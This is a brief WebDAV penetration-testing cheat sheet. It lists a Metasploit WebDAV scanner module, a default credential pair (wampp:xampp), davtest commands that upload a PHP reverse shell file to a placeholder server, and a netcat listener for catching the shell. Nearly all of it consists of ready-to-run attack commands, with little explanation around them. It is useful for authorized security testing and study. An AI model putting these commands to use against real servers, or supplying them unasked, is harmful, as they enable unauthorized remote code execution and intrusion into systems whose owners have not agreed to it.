WebDAV Pentesting
Enumeration
msfconsole
msf> use auxiliary/scanner/http/webdav_scannerDefault Credentials
wampp:xamppReverse Shell
1. Check if the exploit can be uploaded
davtest -url http://example.com/davdir -auth 'user:pass'2. Upload the Reverse Shell Script
davtest -url http://example.com/davdir -auth 'user:pass' -uploadfile shell.php -uploadloc shell.php3. Get a Shell
nc -lvnp 4444Last updated